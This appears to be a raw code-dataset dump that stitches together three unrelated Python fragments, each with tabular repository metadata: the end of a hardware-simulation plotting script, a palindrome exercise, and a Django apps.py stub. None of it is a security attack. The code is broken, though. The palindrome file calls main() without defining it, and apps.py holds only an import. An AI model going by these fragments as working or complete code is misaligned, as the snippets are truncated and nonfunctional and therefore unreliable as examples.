data_in.set(data)
for i in range(2):
stb_in.set(i==1)
if i==1:
response.append(magnitude.get())
clk.tick()
i+=1
response = np.array(response)
plt.plot(response)
plt.plot(stimulus)
plt.show()
| 30.313253 | 131 | 0.65779 |
9fec2b87298b7ce1d8fa49d924c18e361c3fbd3b | 737 | py | Python | chpt6/Palindrome.py | GDG-Buea/learn-python | 9dfe8caa4b57489cf4249bf7e64856062a0b93c2 | [
"Apache-2.0"
] | null | null | null | chpt6/Palindrome.py | GDG-Buea/learn-python | 9dfe8caa4b57489cf4249bf7e64856062a0b93c2 | [
"Apache-2.0"
] | 2 | 2018-05-21T09:39:00.000Z | 2018-05-27T15:59:15.000Z | chpt6/Palindrome.py | GDG-Buea/learn-python | 9dfe8caa4b57489cf4249bf7e64856062a0b93c2 | [
"Apache-2.0"
] | 2 | 2018-05-19T14:59:56.000Z | 2018-05-19T15:25:48.000Z |
# This program prompts a user to enter an integer and reports whether the integer is a palindrome or not
# A number is a palindrome if its reversal is the same as itself.
main() | 23.03125 | 104 | 0.679783 |
9fec53592de30b9286e20a972b9d6a2e491fec66 | 89 | py | Python | refugee/apps.py | poiedk/refugge_app | 95299005a3fac1ae92cf700d8d52e884c1d17033 | [
"MIT"
] | 1 | 2020-06-07T15:48:34.000Z | 2020-06-07T15:48:34.000Z | refugee/apps.py | poiedk/refuggeapp | 95299005a3fac1ae92cf700d8d52e884c1d17033 | [
"MIT"
] | 1 | 2020-06-05T20:15:54.000Z | 2020-06-05T20:15:54.000Z | refugee/apps.py | poiedk/refuggeapp | 95299005a3fac1ae92cf700d8d52e884c1d17033 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 14.833333 | 33 | 0.752809 |